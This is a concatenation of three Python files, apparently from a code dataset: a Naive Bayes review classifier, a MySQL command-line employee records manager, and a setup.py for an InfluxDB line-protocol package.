    tokens = [w.lower() for w in word_tokenize(review)]
    # translation table that deletes every punctuation character
    table = str.maketrans('', '', string.punctuation)
    stripped = [w.translate(table) for w in tokens]
    words = [porter.stem(word) for word in stripped if word.isalpha()]
    return [word for word in words if word not in stop_words]
def findcharClass(n):
    """Bucket a review's character count into one of five class labels
    ($A$..$E$) with boundaries at 400/800/1200/1600."""
    buckets = ((400, "$A$"), (800, "$B$"), (1200, "$C$"), (1600, "$D$"))
    for bound, label in buckets:
        if n < bound:
            return label
    return "$E$"
def findwordClass(n):
    """Bucket a review's word count into one of five class labels
    ($A$..$E$) with boundaries at 100/200/300/400."""
    buckets = ((100, "$A$"), (200, "$B$"), (300, "$C$"), (400, "$D$"))
    for bound, label in buckets:
        if n < bound:
            return label
    return "$E$"
def findDenseClass(n):
    """Bucket an average word length into one of five class labels
    ($A$..$E$) with boundaries at 4/8/12/16."""
    buckets = ((4, "$A$"), (8, "$B$"), (12, "$C$"), (16, "$D$"))
    for bound, label in buckets:
        if n < bound:
            return label
    return "$E$"
TokenizedReviews = []
def initializeModel(fcnt):
    """Reset the model globals and build the vocabulary from train_data.

    fcnt == 0 adds word bigrams to every tokenized review and to the
    vocabulary; fcnt > 0 uses unigrams only and adds the five bucket
    labels $A$..$E$ used by the char/word-count features.  Also persists
    the vocabulary to vocabulary_e.txt and zero-initializes theta.
    """
    global vocabulary, theta, phi, cnt, TokenizedReviews
    vocabulary = set()
    theta = {}
    phi = {}
    cnt = {}
    TokenizedReviews = []
    for index, data in train_data.iterrows():
        review = data['reviewText']
        label = data['overall']
        theta[label] = {}
        cnt[label] = 0
        phi[label] = 0
        words = tokenize(review)
        # convert to bigrams
        bigrams = [words[i] + words[i+1] for i in range(len(words) - 1)]
        if fcnt == 0:
            TokenizedReviews.append(words + bigrams)
            for word in words + bigrams:
                vocabulary.add(word)
        else:
            TokenizedReviews.append(words)
            for word in words:
                vocabulary.add(word)
    if fcnt > 0:
        vocabulary.add("$A$")
        vocabulary.add("$B$")
        vocabulary.add("$C$")
        vocabulary.add("$D$")
        vocabulary.add("$E$")
    # pseudo-word for out-of-vocabulary tokens at prediction time
    vocabulary.add("UNK")
    # fixed: use a context manager so the file is closed even if the
    # write raises (the original used bare open()/close())
    with open("vocabulary_e.txt", "w") as file:
        file.write(json.dumps(list(vocabulary)))
    # zero-initialize the per-label word counts
    for label in theta:
        for word in vocabulary:
            theta[label][word] = 0
def learnParameters(fcnt):
    """Count token occurrences, then convert them into smoothed parameters.

    Fills the globals ``phi`` (class priors), ``theta`` (per-class token
    probabilities, Laplace-smoothed) and ``cnt`` (per-class token totals)
    from ``train_data`` and the ``TokenizedReviews`` lists built by
    initializeModel(). ``m`` is assumed to be the number of training
    documents -- TODO confirm where it is defined.
    """
    for index, data in train_data.iterrows():
        review = data['reviewText']
        label = data['overall']
        words = TokenizedReviews[index]
        phi[label] += 1
        for word in words:
            theta[label][word] += 1
            cnt[label] += 1
        if fcnt == 1:
            # Extra pseudo-word feature keyed on the review's char count.
            theta[label][findcharClass(len(review))] += 1
        if fcnt == 2:
            theta[label][findwordClass(len(words))] += 1
        # avg word length
        # theta[label][findDenseClass(len(review) / len(words))] += 1
    for label in theta:
        for word in vocabulary:
            # Laplace smoothing: +1 on the count, +|V|+1 on the denominator.
            theta[label][word] = (theta[label][word] + 1) / \
                (cnt[label] + len(vocabulary) + 1)
        # BUG FIX: this statement sat one indent level to the left (outside
        # the label loop), so only the last-iterated label's prior was
        # divided by m while the others stayed raw counts, skewing the
        # log(phi[label]) comparison in predict().
        phi[label] /= m
def predict(words, label):
    """Log-posterior (up to a shared constant) of *label* given *words*.

    Out-of-vocabulary tokens fall back to the "UNK" probability. Reads the
    module-level globals ``phi``, ``theta`` and ``vocabulary``.
    """
    unk_prob = theta[label]["UNK"]
    total = np.log(phi[label])
    for token in words:
        prob = theta[label][token] if token in vocabulary else unk_prob
        total += np.log(prob)
    return total
def findModelAccuracy(input_data, fcnt, datatype):
    """Classify every review in *input_data*, print F1 scores and accuracy.

    input_data: pandas-style frame with 'reviewText' and 'overall' columns
                (assumed -- mirrors train_data; TODO confirm at call site).
    fcnt:       feature configuration, same meaning as in initializeModel.
    datatype:   label used in the progress/accuracy messages ("Testing", ...).
    """
    print("Running model on " + datatype + " data.")
    correct = 0
    total = len(input_data)
    y_true = []
    y_predict = []
    for index, data in input_data.iterrows():
        review = data['reviewText']
        words = tokenize(review)
        # Bigrams are only consumed by the fcnt == 0 branch below.
        bigrams = [words[i] + words[i+1] for i in range(len(words) - 1)]
        ans_label = data['overall']
        # Arg-max over labels; start below any reachable log-probability.
        ans, logProbab = "", - sys.maxsize
        for label in phi:
            if fcnt == 0:
                prediction = predict(words + bigrams, label)
            if fcnt == 1:
                # Length-bucket pseudo-word, weighted 5x in log space.
                prediction = predict(
                    words, label) + 5*np.log(theta[label][findcharClass(len(review))])
            if fcnt == 2:
                prediction = predict(
                    words, label) + 5*np.log(theta[label][findwordClass(len(words))])
            # avg word length
            # prediction = predict(words, label) + 5 * np.log(theta[label][findDenseClass(len(review) / len(words))])
            if logProbab <= prediction:
                ans = label
                logProbab = prediction
        if ans_label == ans:
            correct += 1
        y_true.append(ans_label)
        y_predict.append(ans)
    F1_Confusion(y_true, y_predict)
    print("Model " + datatype + " accuracy:",
          "{:.2f}".format(correct/total*100) + "%")
# Driver: train and evaluate the classifier once per feature configuration.
# ``fcnt`` indexes the configuration: 0 = unigrams + bigrams,
# 1 = unigrams + character-count bucket, 2 = unigrams + word-count bucket.
# (The "charcter" typo below is inside a runtime string and left untouched.)
features = ['single words + bigrams',
            'single words + charcter count', 'single words + word count']
fcnt = 0
for feature in features:
    print("\nTesting with feature - " + feature)
    st = time.time()  # wall-clock training time
    initializeModel(fcnt)
    learnParameters(fcnt)
    en = time.time()
    print("Training Time = " + "{:.2f}".format(en - st) + " sec")
    # findModelAccuracy(train_data, "Training")
    findModelAccuracy(test_data, fcnt, "Testing")
    fcnt += 1
| AparAhuja/Machine_Learning | Naive Bayes and SVM/Q1/e.py | e.py | py | 6,378 | python | en | code | 0 | github-code | 36 |
def adde():
    """Prompt for a new employee's details and INSERT them into ``user``.

    BUG FIX: the original inserted the literal string "id" as every row's
    id, so a second insert collides on the id column; the id is now read
    from the user like every other field.
    """
    emp_id = input('Employee ID : ')
    name = input('Employee Name : ')
    lname = input('Employee Last Name')
    email = input('Employee Email')
    phone = input('Employee Phone Number :')
    address = input('Employee Address :')
    salary = input('Employee salary')
    c_det = (emp_id, name, lname, email, phone, address, salary)
    qry = "INSERT INTO user Values (%s,%s,%s,%s,%s,%s,%s)"
    # Values are bound as placeholders, never interpolated into the SQL.
    db_cursor.execute(qry, c_det)
    db.commit()
    print('Customer details entered')
def ved():
    """Prompt for an employee id and print that employee's full record."""
    emp_id = input("Write id")
    cursor.execute("""select * from user where id = %s""", (emp_id,))
    print(cursor.fetchall())
def ep():
    """Update the salary of one employee (the "promotion" menu action)."""
    qry = """UPDATE user SET salary = %s WHERE id = %s"""
    j = int(input("Write id of Employee you want to change the salary"))
    n = input("Write the new salary")
    cursor.execute(qry, (n, j))
    # BUG FIX: the original called cursor.fetchall() here; an UPDATE yields
    # no result set and fetchall() raises "No result set to fetch from" in
    # mysql.connector. The commit alone is what persists the change.
    db.commit()
def re():
    """Delete one employee by id after a yes/no confirmation.

    NOTE(review): this function shadows the stdlib ``re`` module name; the
    name is kept because the menu at the bottom of the file calls ``re()``.
    """
    qry = "DELETE FROM user WHERE id = %s"
    n = input("Write id")
    y = input("Are you sure?(Y/N)")
    # Case-insensitive check generalises the original's literal list
    # ("Y", "YES", "Yes", "yes", "y") while accepting the same inputs.
    if y.strip().lower() in ("y", "yes"):
        cursor.execute(qry, (n,))
        db.commit()
        print("Employee deleted successfully")
    else:
        exit()
def es():
    """Search the ``user`` table by the column selected in the global ``k``.

    ``k`` is set by the menu: 1=id, 2=name, 3=lname, 4=email, 5=phone.
    Any other value exits the program, matching the original ``else``.
    """
    # Identifier whitelist: column names cannot be bound as %s placeholders,
    # so they are interpolated from this fixed mapping only (no injection).
    columns = {
        1: ("id", "Write id"),
        2: ("name", "Write name"),
        3: ("lname", "Write last name"),  # prompt typo "laste" fixed
        4: ("email", "Write email"),
        5: ("phone", "Enter phone number"),
    }
    if k not in columns:
        exit()
    column, prompt = columns[k]
    cursor = db.cursor()  # fresh local cursor, as in each original branch
    value = input(prompt)
    cursor.execute("select * from user where " + column + " = %s", (value,))
    print(cursor.fetchall())
def em():
    """Edit one field of the ``user`` table for a single employee.

    The global ``k`` (set by the menu) selects the field: 1=id, 2=name,
    3=lname, 4=email, 5=phone, 6=address, 7=salary. Any other value exits.

    BUG FIXES vs. the original:
      * k == 6 ran ``UPDATE user SET email = ...`` while prompting for a
        salary; per the menu (6=address, 7=Salary) k == 6 now updates
        ``address`` and k == 7 updates ``salary``.
      * ``cursor.fetchall()`` after an UPDATE raises "No result set to
        fetch from" in mysql.connector and has been removed.
    """
    # Column whitelist: identifiers cannot be SQL placeholders, so they are
    # interpolated from this fixed mapping only. The second element is the
    # human-readable label used in the prompts.
    fields = {
        1: ("id", "id"),
        2: ("name", "name"),
        3: ("lname", "last name"),
        4: ("email", "email"),
        5: ("phone", "phone"),
        6: ("address", "address"),
        7: ("salary", "salary"),
    }
    if k not in fields:
        exit()
    column, label = fields[k]
    all()  # show the current rows so the user can pick a valid id
    j = int(input("Write id of Employee you want to change the " + label))
    n = input("Write the new " + label)
    cursor.execute("UPDATE user SET " + column + " = %s WHERE id = %s", (n, j))
    db.commit()
    print("Data change Successfully")
def inl():
    """Print a compact listing (id, first name, last name) of all employees."""
    cursor.execute("SELECT id,name , lname FROM user;")
    print(cursor.fetchall())
def all():
    """Print every column of every row in ``user``.

    NOTE(review): the name shadows the builtin ``all``; it is kept because
    ``em()`` and other callers use it by this name.
    """
    cursor.execute("SELECT * FROM user;")
    print(cursor.fetchall())
import mysql.connector as mysql
# Shared connection and cursors used by every helper function above.
# Credentials are hard-coded for a local development database.
db = mysql.connect(
    host="localhost",
    user="root",
    password="",
    database="project"
)
db_cursor = db.cursor()  # used by adde()
cursor = db.cursor()  # used by the read/update/delete helpers
# Main menu: one action per run; the script simply ends afterwards.
print ("1) Add Employee.")
print ("2) View Employee Details.")
print ("3) Employee Promotion(Relates to salary increase).")
print ("4) Remove Employee.") # gives the user the choice of what to do
print ("5) Employee Search.")
print ("6) Edit Employee.")
print("7) Exit.")
x =int(input("Choose"))
if x == 1:
    adde()
elif x == 2:
    # Show the id/name listing first so the user can pick a valid id.
    inl()
    ved()
elif x == 3:
    inl()
    ep()
elif x == 4: # dispatch to the helper functions defined above
    inl()
    re()
elif x == 5:
    # ``k`` is a module-level global read by es().
    k = int(input("1)id \n2)name\n3)lname\n4)email\n5)phone number\n"))
    es()
elif x == 6:
    # ``k`` is a module-level global read by em().
    k = int(input("1)id \n2)name\n3)lname\n4)email\n5)phone number\n6)address\n7)Salary"))
    em()
# NOTE(review): option 7 (Exit) and any invalid choice fall through here --
# no else branch; the script ends without calling a helper.
| hsvac/HR_aplication | vladislav_donea.py | vladislav_donea.py | py | 6,253 | python | en | code | 0 | github-code | 36 |
import setuptools
# Long description for PyPI, rendered from the README. UTF-8 is requested
# explicitly so the build does not depend on the platform's locale encoding.
with open("README.md", "r", encoding="utf-8") as fh:
    long_description = fh.read()
def read_file(file_name):
    """Return the full text contents of *file_name*, decoded as UTF-8.

    Uses a context manager so the handle is closed even on error (the
    original leaked the file object), and pins the encoding so the result
    does not vary with the platform's default locale.
    """
    with open(file_name, "r", encoding="utf-8") as f:
        return f.read()
# Package metadata; ``long_description`` is read from README.md above.
setuptools.setup(
    name="influx-line-protocol",
    description="Implementation of influxdata line protocol format in python",
    long_description=long_description,
    # Tells PyPI to render the long description as Markdown.
    long_description_content_type="text/markdown",
    version="0.1.5",
    url="https://github.com/SebastianCzoch/influx-line-protocol",
    author="Sebastian Czoch",
    author_email="sebastian@czoch.pl",
    license="MIT",
    classifiers=[
        "Development Status :: 4 - Beta",
        "Intended Audience :: System Administrators",
        "License :: OSI Approved :: MIT License",
        "Programming Language :: Python :: 2",
        "Operating System :: OS Independent",
    ],
    # Discover every package under the project root automatically.
    packages=setuptools.find_packages(),
)
| SebastianCzoch/influx-line-protocol | setup.py | setup.py | py | 879 | python | en | code | 20 | github-code | 36 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.